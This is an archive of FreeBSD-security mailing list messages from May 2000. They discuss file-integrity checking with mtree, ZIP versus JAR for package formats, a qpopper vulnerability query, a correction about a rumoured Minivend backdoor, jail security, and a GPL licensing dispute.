From owner-freebsd-security Sun May 14 7:30: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id DB51D37B614 for ; Sun, 14 May 2000 07:29:57 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA07649; Sun, 14 May 2000 07:28:38 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda07645; Sun May 14 07:28:34 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA78759; Sun, 14 May 2000 07:28:30 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdk78757; Sun May 14 07:28:00 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4EERx101152; Sun, 14 May 2000 07:27:59 -0700 (PDT) Message-Id: <200005141427.e4EERx101152@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdoa1147; Sun May 14 07:27:19 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Garrett Wollman Cc: Cy Schubert - ITSD Open Systems Group , Mark Murray , Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 23:06:57 EDT." <200005120306.XAA22136@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 14 May 2000 07:27:18 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200005120306.XAA22136@khavrinen.lcs.mit.edu>, Garrett Wollman write s: > < Cy.Schubert@uumail.gov.bc.ca> said: > > > I think that having tripwire or something with the same functionality > > and features should be included in the base system. > > We do. It would take a bit of work to create an `exclude' file (see > my recent commit) so that constantly-changing files would not raise > alarms, but otherwise `mtree -K md5digest,sha1digest,ripemd160digest' > should do the trick. Any chance of the new exclude code being MFC'd into -stable any time soon? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 14 8:16: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id 2764C37BCCB for ; Sun, 14 May 2000 08:16:04 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.3) with ESMTP id LAA05695; Sun, 14 May 2000 11:15:52 -0400 (EDT) (envelope-from matt@zigg.com) Date: Sun, 14 May 2000 11:15:51 -0400 (EDT) From: Matt Behrens To: Doug Barton Cc: freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <391E4BCC.6EA3DB59@gorean.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 13 May 2000, Doug Barton wrote: > I concur. I've always wondered why (info-)zip hasn't enjoyed more > popularity in the unix world. I used it extensively back when I ran > OS/2, and it has a lot of nice features. The reasons I've always avoided it: 1) until now, I've had this misconception (I don't know where it came from, but I just investigated it) that it did not handle UNIX permissions and ownerships (note that unzip does need a flag to restore ownerships); 2) every time I dig unzip out again it takes me several tries to remember just how to get recursion like I'm used to with tar. That said, I've used it to make up archives for Windoze boxes on several occasions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 7:28:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.telemere.net (shell.telemere.net [63.224.9.3]) by hub.freebsd.org (Postfix) with ESMTP id 18CAD37B5B2 for ; Mon, 15 May 2000 07:28:30 -0700 (PDT) (envelope-from visigoth@telemere.net) Received: by shell.telemere.net (Postfix, from userid 1001) id E44D170601; Mon, 15 May 2000 09:27:40 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by shell.telemere.net (Postfix) with ESMTP id E0D296C807 for ; Mon, 15 May 2000 09:27:40 -0500 (CDT) Date: Mon, 15 May 2000 09:27:40 -0500 (CDT) From: Visigoth To: freebsd-security@freebsd.org Subject: qpopper discussion on BUGTRAQ Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings all... I was just curious as to what the freebsd stance on the possible qpopper-2.53 vuln as is being discussed on BUGTRAQ. Has this vuln been tested with the freebsd port? Are there known issues? I am going to (hopefully) be taking a look at the "exploitability" of the freebsd port for qpopper-2.53 but I was wondering if someone had already done all the work. I under stand that the exploit posted on bugtraq would need to be modified, but I am wondering if the security/ports team have taken care of the offending piece of code already (which is so often the case)... Even just a "Blah Blah Blah, NOT vulnerable" would be kewl... Thanks Visigoth Damieon Stark Sr. Unix Systems Administrator visigoth@telemere.net ____________________________________________________________________________ | - M$ Win 2K was built for the internet. | - Unix _BUILT_ the internet. | FreeBSD - The POWER to serve | http://www.freebsd.org your call... | | ---------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:12:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6004837B7A8 for ; Mon, 15 May 2000 08:12:38 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA08034; Mon, 15 May 2000 09:12:24 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3920145A.D38B5731@softweyr.com> Date: Mon, 15 May 2000 09:14:34 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Michael Robinson Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) References: <200005131111.TAA13455@netrinsics.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Robinson wrote: > > Nate Williams writes: > >There are numerous advantages to using something like ZIP, including > >removing the requirement to 'unpack' the archive in a staging area, > >since we could now unpack it directly in it's installation location. > > > >ZIP also allows signatures, and we have lots of free software that we > >can leverage to implement the tools with it. > > Or, heck, why not JAR format, seeing as it's a well-defined standard, does > everything necessary, and has multiple interoperable implementations. JARs have a table of contents? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:27:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 0ACF937B7F6 for ; Mon, 15 May 2000 08:27:24 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA08070; Mon, 15 May 2000 09:27:16 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <392017D7.C22BDB57@softweyr.com> Date: Mon, 15 May 2000 09:29:27 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Michael Robinson Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) References: <200005131542.XAA13898@netrinsics.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Robinson wrote: > > Nate Williams writes: > >> Or, heck, why not JAR format, seeing as it's a well-defined standard, does > >> everything necessary, and has multiple interoperable implementations. > > > >FWIW, it's the same format. :) :) > > Not strictly true. All JAR files are ZIP files, but not all ZIP files are > JAR files. > > >From your paen to the benefits of ZIP files, it sounded like you might > go off and reinvent manifests, signature meta-data, and all the other > stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way. Got a handy pointer to the JAR spec? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:34: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from naiad.eclipse.net.uk (naiad.eclipse.net.uk [195.188.32.29]) by hub.freebsd.org (Postfix) with ESMTP id 1A70237B742 for ; Mon, 15 May 2000 08:33:58 -0700 (PDT) (envelope-from stuart@eclipse.net.uk) Received: by naiad.eclipse.net.uk (Postfix, from userid 475) id 2D80C131E7; Mon, 15 May 2000 16:37:41 +0100 (BST) Date: Mon, 15 May 2000 16:37:40 +0100 From: Stuart Henderson To: Wes Peters Cc: Michael Robinson , nate@yogotech.com, freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) Message-ID: <20000515163740.M83350@naiad.eclipse.net.uk> References: <200005131542.XAA13898@netrinsics.com> <392017D7.C22BDB57@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <392017D7.C22BDB57@softweyr.com>; from wes@softweyr.com on Mon, May 15, 2000 at 09:29:27AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 15, 2000 at 09:29:27AM -0600, Wes Peters wrote: > Got a handy pointer to the JAR spec? http://java.sun.com/products/jdk/1.1/docs/guide/jar/ http://docs.iplanet.com/docs/manuals/signedobj/jarfile/jar.htm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:37:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from guardian.sparc.spb.su (guardian.sparc.spb.su [195.19.226.7]) by hub.freebsd.org (Postfix) with ESMTP id E29AA37B78B for ; Mon, 15 May 2000 08:37:42 -0700 (PDT) (envelope-from adu@sparc.spb.su) Received: from guard.sparc.spb.su (guard.sparc.spb.su [195.19.226.98]) by guardian.sparc.spb.su (8.9.3/8.9.3) with ESMTP id TAA08619; Mon, 15 May 2000 19:38:53 +0400 (MSD) Received: from mail.sparc.spb.su (mail.sparc.spb.su [192.168.205.210]) by guard.sparc.spb.su (8.9.3/8.9.3) with ESMTP id TAA04004; Mon, 15 May 2000 19:37:11 +0400 (MSD) Received: from indra (indra.sparc.spb.su [192.168.205.84]) by mail.sparc.spb.su (8.9.3/8.9.3) with SMTP id TAA24714; Mon, 15 May 2000 19:30:17 +0400 (MSD) Message-Id: <200005151530.TAA24714@mail.sparc.spb.su> Date: Mon, 15 May 2000 19:36:41 +0400 (MSD) From: "Denis Y. Antrushin" Reply-To: "Denis Y. Antrushin" Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) To: wes@softweyr.com Cc: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: AxTBWdeOkpWsfiALzQZ//A== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.3.4 SunOS 5.7 sun4u sparc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> Not strictly true. All JAR files are ZIP files, but not all ZIP files are >> JAR files. >> >> >From your paen to the benefits of ZIP files, it sounded like you might >> go off and reinvent manifests, signature meta-data, and all the other >> stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way. > >Got a handy pointer to the JAR spec? http://java.sun.com/products/jdk/1.1/docs/guide/jar/ Not sure it's handy, though ;-) -- Denis Antrushin, St-Petersburg HotJava Team e-mail: adu@sparc.spb.su To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:48:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id EC4D737B5A0 for ; Mon, 15 May 2000 08:48:01 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA02421; Mon, 15 May 2000 09:47:29 -0600 (MDT) Message-Id: <4.3.1.2.20000515094342.045eb7e0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 15 May 2000 09:47:21 -0600 To: mike@minivend.com From: Brett Glass Subject: Re: (forw) Back door in Minivend Cc: security@freebsd.org In-Reply-To: <20000515100638.A28429@bill.minivend.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've checked the lists, and no, your program does not appear to be the one which was reported to have a back door. I stand corrected. The only thing that appears to be harmful about the program is that it is GPLed. You really SHOULD consider using a truly free license! According to Bruce Perens, the next version of the GPL will impose nasty conditions upon service providers and merchants who use GPLed code, such as requiring them to reveal all of their in-house additions to it even if they do not redistribute it. --Brett At 08:06 AM 5/15/2000, Mike Heins wrote: >Would appreciate it if you would correct your misstatement >on the freebsd mail lists (I am not a subscriber). Thanks. > >Mike >----- Forwarded message from Mike Heins ----- > >Date: Mon, 15 May 2000 00:03:59 -0400 >From: Mike Heins >To: lunatic@insane.net >Subject: Back door in Minivend >Reply-To: mike@minivend.com >X-Mailer: Mutt 1.0pre3us > >I can assure you that there are no author-inserted back doors >in Minivend, as I am the author. 8-) > >The source is completely open, is GPL, and has been examined by quite >a few people. If you hear of any security problems, let me know. > >I am positive that there has not been a vulnerability posted >to Bugtraq; certainly one of the thousands of Minivend users >would have brought that to my attention. > >If you could post this to the freebsd mail list I would >appreciate it, as I don't have access to it. > >Regards, >Mike Heins >-- >Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 >phone +1.513.523.7621 fax 7501 > >Friends don't let friends use Outlook. -- Bob Blaylock > >----- End forwarded message ----- > >-- >Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 >phone +1.513.523.7621 fax 7501 > >Unix version of an Outlook-style virus: >It works on the honor system. Please forward this message to everyone >you know, and delete a bunch of your files at random. If nothing else, the brain is an educational toy. -- Tom Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 8:54: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 1E74C37B78B for ; Mon, 15 May 2000 08:54:00 -0700 (PDT) (envelope-from mike@bill.minivend.com) Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id LAA30050; Mon, 15 May 2000 11:52:49 -0400 Date: Mon, 15 May 2000 11:52:49 -0400 From: Mike Heins To: Brett Glass Cc: security@freebsd.org Subject: Re: (forw) Back door in Minivend Message-ID: <20000515115249.A30046@bill.minivend.com> Reply-To: mike@minivend.com References: <20000515100638.A28429@bill.minivend.com> <4.3.1.2.20000515094342.045eb7e0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3us In-Reply-To: <4.3.1.2.20000515094342.045eb7e0@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Brett Glass (brett@lariat.org): > The only thing that appears to be harmful about the > program is that it is GPLed. You really SHOULD consider > using a truly free license! According to Bruce Perens, > the next version of the GPL will impose nasty conditions > upon service providers and merchants who use GPLed code, > such as requiring them to reveal all of their in-house > additions to it even if they do not redistribute it. > Soapbox noted. -- Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 phone +1.513.523.7621 fax 7501 Be patient. God isn't finished with me yet. -- unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 9: 4:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 3B11537B5E6 for ; Mon, 15 May 2000 09:04:47 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Mon, 15 May 2000 10:04:34 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma024757; Mon, 15 May 00 10:04:21 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA23756; Mon, 15 May 2000 10:04:20 -0600 (MDT) Date: Mon, 15 May 2000 10:04:20 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Brett Glass Cc: mike@minivend.com, security@FreeBSD.ORG Subject: Re: (forw) Back door in Minivend In-Reply-To: <4.3.1.2.20000515094342.045eb7e0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Brett Glass wrote: > According to Bruce Perens, the next version of the GPL will impose > nasty conditions upon service providers and merchants who use GPLed > code, such as requiring them to reveal all of their in-house additions > to it even if they do not redistribute it. And how much FUD spinning is that? SPIN IT BABY!! Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 9:21: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id E1F1337B6B6 for ; Mon, 15 May 2000 09:20:59 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 48153 invoked from network); 15 May 2000 16:20:58 -0000 Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 15 May 2000 16:20:58 -0000 Message-ID: <052001bfbe89$8087e590$040aa8c0@local.mindstep.com> From: "Patrick Bihan-Faou" To: References: <200005131542.XAA13898@netrinsics.com> <392017D7.C22BDB57@softweyr.com> <20000515163740.M83350@naiad.eclipse.net.uk> Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) Date: Mon, 15 May 2000 12:20:36 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, From: "Stuart Henderson" > On Mon, May 15, 2000 at 09:29:27AM -0600, Wes Peters wrote: > > Got a handy pointer to the JAR spec? > > http://java.sun.com/products/jdk/1.1/docs/guide/jar/ > http://docs.iplanet.com/docs/manuals/signedobj/jarfile/jar.htm > After looking at the jar "specification", it only offers a way to resolve the "signing" problem. While this is good, I wonder how well extensions to support the other features I am looking at implemented would be supported by other "jar openers". Is this the way we should go: - create a "libjar" that can open and parse the content of the manifest in a reasonable way - (re)create the packaging tool so that it obtains its information from the jar file. The question is also: how do we go about manifest extensions in order to support all of what we needed ? - do we just create a set of "FreeBSD-specific" header/value pairs ? - are there more headers specified for the JAR files ? It looks to me that using this file format could be worthwhile, but to provide the level of functionality that we have currently with pkg_* it will require a good deal of non-standard extensions. So are there any more complete specs for the jar files ? Should we pursue in that direction ? Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 9:52:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from falcon.grobin.org (falcon.grobin.org [204.225.173.44]) by hub.freebsd.org (Postfix) with ESMTP id 32A6237B719 for ; Mon, 15 May 2000 09:51:55 -0700 (PDT) (envelope-from geoff@grobin.org) Received: by falcon.grobin.org (Postfix, from userid 1000) id 01BDA2C4; Mon, 15 May 2000 12:53:42 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by falcon.grobin.org (Postfix) with ESMTP id EFB112C2 for ; Mon, 15 May 2000 12:53:42 -0400 (EDT) Date: Mon, 15 May 2000 12:53:42 -0400 (EDT) From: Geoffrey Robinson To: security@freebsd.org Subject: Jail: Problems? Proper Usage? Status? Practicality? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000 I'm planning to use jail in the near future to do two things. First is to generally increase the security of a system by putting services like http, smtp, ftp, etc. into separate jails to decrease the potential harm of a security hole. This system will only allow shell accesses to trusted individuals. The second plan is to create multiple, virtual servers on another host system. These virtual servers will allow shell access to semi-trusted individuals, including the jail root user. Also the jail administrator could potentially run unsecure services. This second plan is tentative depending on the reliability of jail. I have setup a test jail on my workstation with good results. The first problem I have found is that I can't access the jailed IP at all from the host system, nor the host system from the jailed one. However both host and jailed IPs are accessible to other machines on the network. Is this intentional? The jailed system can access the Internet fine through my natd setup on the host system (which actually surprised me). I'm aware that raw sockets are not allowed to jailed processes but is there a workaround for ping and traceroute? Finally how secure is jail really? I'm aware of a trivial chroot breakout technique. Does that hole still exist? Are there any other known holes? Is jail still under active development? Is it worth the trouble to do any of this? Thanks. ------------------------------------------------------------------------------ | Geoffrey Robinson - geoff@grobin.org | ------------------------------------------------------------------------------ Random Fortune Quote When you're not looking at it, this fortune is written in FORTRAN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 10:18: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 6462137BB83 for ; Mon, 15 May 2000 10:17:57 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id TAA06179; Mon, 15 May 2000 19:17:35 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Geoffrey Robinson Cc: security@FreeBSD.ORG Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-reply-to: Your message of "Mon, 15 May 2000 12:53:42 EDT." Date: Mon, 15 May 2000 19:17:35 +0200 Message-ID: <6177.958411055@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I have setup a test jail on my workstation with good results. The first >problem I have found is that I can't access the jailed IP at all from the >host system, nor the host system from the jailed one. However both host >and jailed IPs are accessible to other machines on the network. Is this >intentional? Sounds like some kind of configuration error in your end. It works fine for me. In general it is best to add the IP aliases to the lo0 interface. >Finally how secure is jail really? I don't know of any way to escape. There are a few known things where someone in a jail can make a nuisance of themselves, but not a way for them to break out. >Is jail still under active development? I would call it "under normal maintenance", there are no planned new features on the way. >Is it worth the trouble to do any of this? Now how would *I* know ? :-) -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11: 1:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 13D7C37BBFD for ; Mon, 15 May 2000 11:01:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA03881; Mon, 15 May 2000 12:00:46 -0600 (MDT) Message-Id: <4.3.1.2.20000515115811.045e6690@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 15 May 2000 12:00:37 -0600 To: Paul Hart From: Brett Glass Subject: Re: (forw) Back door in Minivend Cc: mike@minivend.com, security@FreeBSD.ORG In-Reply-To: References: <4.3.1.2.20000515094342.045eb7e0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:04 AM 5/15/2000, Paul Hart wrote: >On Mon, 15 May 2000, Brett Glass wrote: > > > According to Bruce Perens, the next version of the GPL will impose > > nasty conditions upon service providers and merchants who use GPLed > > code, such as requiring them to reveal all of their in-house additions > > to it even if they do not redistribute it. > >And how much FUD spinning is that? SPIN IT BABY!! It's not FUD; it is the absolute truth. I have the tape of the session at the February LinuxWorld in which Bruce said that -- emphatically. One of these days, people will begin to get the idea that the GPL is not actually about freedom. It is, rather, a weapon of spite and an attempt to accumulate power and control. --Brett Glass If nothing else, the brain is an educational toy. -- Tom Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11: 9:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 38D8D37BC3D for ; Mon, 15 May 2000 11:09:16 -0700 (PDT) (envelope-from mike@bill.minivend.com) Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id OAA31424; Mon, 15 May 2000 14:07:51 -0400 Date: Mon, 15 May 2000 14:07:51 -0400 From: Mike Heins To: Brett Glass Cc: Paul Hart , mike@minivend.com, security@FreeBSD.ORG Subject: Re: (forw) Back door in Minivend Message-ID: <20000515140751.A31420@bill.minivend.com> Reply-To: mike@minivend.com References: <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3us In-Reply-To: <4.3.1.2.20000515115811.045e6690@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Brett Glass (brett@lariat.org): > At 10:04 AM 5/15/2000, Paul Hart wrote: > > >On Mon, 15 May 2000, Brett Glass wrote: > > > > > According to Bruce Perens, the next version of the GPL will impose > > > nasty conditions upon service providers and merchants who use GPLed > > > code, such as requiring them to reveal all of their in-house additions > > > to it even if they do not redistribute it. > > > >And how much FUD spinning is that? SPIN IT BABY!! > > It's not FUD; it is the absolute truth. I have the tape of the session > at the February LinuxWorld in which Bruce said that -- emphatically. > > One of these days, people will begin to get the idea that the GPL is > not actually about freedom. It is, rather, a weapon of spite and an > attempt to accumulate power and control. > Hi, You can take me off of the Cc: list -- I have had my fill of GPL vs. BSD arguments over time.... 8-) -- Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 phone +1.513.523.7621 fax 7501 Research is what I'm doing when I don't know what I'm doing. -- Wernher Von Braun To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:12:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id A8CFC37B78B for ; Mon, 15 May 2000 11:12:24 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4FIiSe02580; Mon, 15 May 2000 11:44:28 -0700 (PDT) Date: Mon, 15 May 2000 11:44:28 -0700 From: Alfred Perlstein To: Brett Glass Cc: Paul Hart , mike@minivend.com, security@FreeBSD.ORG Subject: Re: (forw) Back door in Minivend Message-ID: <20000515114427.B249@fw.wintelcom.net> References: <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <4.3.1.2.20000515115811.045e6690@localhost>; from brett@lariat.org on Mon, May 15, 2000 at 12:00:37PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 